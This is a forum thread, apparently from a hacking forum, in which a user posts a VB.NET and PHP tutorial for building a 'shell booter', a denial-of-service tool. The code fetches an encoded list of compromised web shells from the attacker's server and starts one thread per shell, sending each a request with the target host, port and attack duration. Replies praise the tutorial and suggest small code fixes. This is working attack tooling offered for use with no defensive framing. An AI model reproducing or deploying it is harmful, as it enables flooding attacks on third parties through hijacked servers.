[i0xIllusi0n]

I'm ashamed to do this in vB, but it was my only choice. Otherwise I would've have it in C#...

Code:

Imports System.Security.Principal
Imports System.Net
Imports System.Web

Code:

Dim client As New WebClient()
    Dim url As String = "http://www.yourwebsite.com/"
    Dim key As String = "sinisterly"
    Dim shellarr As New ArrayList
    Dim current As Integer = 1

On your form load (or login, etc) call this sub. What this does is takes an encrypted string (Base64 ASCII encoded), decrypts it, turns it into a temp array, then adds every string in that temp array to your shell array. Seperates each URL by the character "|" to add to the temp array. If there's an error to loading / decrypting / adding to array, it will tell you in a message box then automatically close.

-shellist.php = Your server-sided file containing the encrypted shell list.
-PHP $_GET['key'] = Your private key, so nobody can see the shell list (yes I know this doesn't stop people)

Example of decrypted string before temp array:

Code:

http://www.example1.com/shell.php?host=[host]&time=[time]&port=[port]|http://www.example2.com/shell.php?host=[host]&time=[time]&port=[port]

Code:

Public Shared Function DecodeFrom64(ByVal encodedData As String) As String
        Dim encodedDataAsBytes As Byte() = System.Convert.FromBase64String(encodedData)
        Dim returnValue As String = System.Text.ASCIIEncoding.ASCII.GetString(encodedDataAsBytes)
        Return returnValue
    End Function

    Private Sub loadShells()
        Try
            Dim total As Integer = 0
            Dim list As String = client.DownloadString(url + "shelllist.php?key=" + key)
            list = DecodeFrom64(list)
            If (list.Contains("http")) Then
                Dim eachshell() As String = list.Split("|")
                For Each indiv As String In eachshell
                    shellarr.Add(indiv)
                    total = total + 1
                Next
            Else
                Close()
            End If
        Catch ex As Exception
            MessageBox.Show(ex.Message)
            Close()
        End Try
    End Sub

Next thing you're going to want to do, is to create a new thread for each shell in the shell array. This is so your program doesn't freeze up while it is sending the attack. Yes, i know this isn't the "proper" way of multi-threading, but fuck it. You run this on an attack button.

Code:

For Each Shell As String In shellarr
    Dim th1 As System.Threading.Thread
    th1 = New System.Threading.Thread(AddressOf attack)
    th1.Start(Shell)
Next

Now that we have the shells loaded and our multi-threading added, we make each thread (1 shell for each thread) actually launch the attack. It takes the URL of the shell API and replaces [time] with the entered time, etc. The "current" integer is just so you can know what shell was just used. (When current = 1, the shell used is shellarr[0], etc) If an error occurs, it will simply move on to the next shell, not worrying about the error.

-bHost = The textbox for the IP / Host
-bTime = The textbox for the time
-bPort = The textbox for the port

Code:

Private Sub attack(ByVal indiv As String)
        Dim host As String =  bHost.Text
        Dim finalshell As String = indiv.Replace("[host]", host)
        Try
            Dim time As String = bTime.Text
            Dim port As String = bPort.Text
            finalshell = finalshell.Replace("[time]", time)
            finalshell = finalshell.Replace("[port]", port)
            Dim swc = New WebClient()
            Dim nb As Byte() = swc.DownloadData(finalshell)
            current = current + 1
        Catch ex As Exception
            current = current + 1
        End Try
    End Sub

Here's shelllist.php:

Code:

<?php
$key = $_GET['key'];
if (isset($key) && $key == "sinisterly")
{
    $list = 'ENCRYPTED_SHELL_LIST_GOES_HERE';
    echo $list;
}
else
{
    echo 'Incorrect key';
}

?>

[Nefarious]

This is a pretty nice tutorial, it should help A LOT of people that constantly ask how to make a shell booter.

[Lain]

Thanks for this, it may come in handy

[yokai_old]

The encryption here is pointless, you picked VB and atleast you recognize that was bad, C# wouldn't be any better, I appreciate your efforts, nonetheless, bad tutorial is bad.

[i0xIllusi0n]

The encryption here is pointless, you picked VB and atleast you recognize that was bad, C# wouldn't be any better, I appreciate your efforts, nonetheless, bad tutorial is bad.

Well of course the encryption is pointless. It'll stop the 12 year olds who don't know what Base64 is.
It's a basic booter, of course. I'm not going to make a full-blown advanced program. The core of my booter (this thread) was made in a half hour.

[SQLi]

You should dispose of the webclients.

[i0xIllusi0n]

You should dispose of the webclients.

Should. Although it doesn't make a huge difference.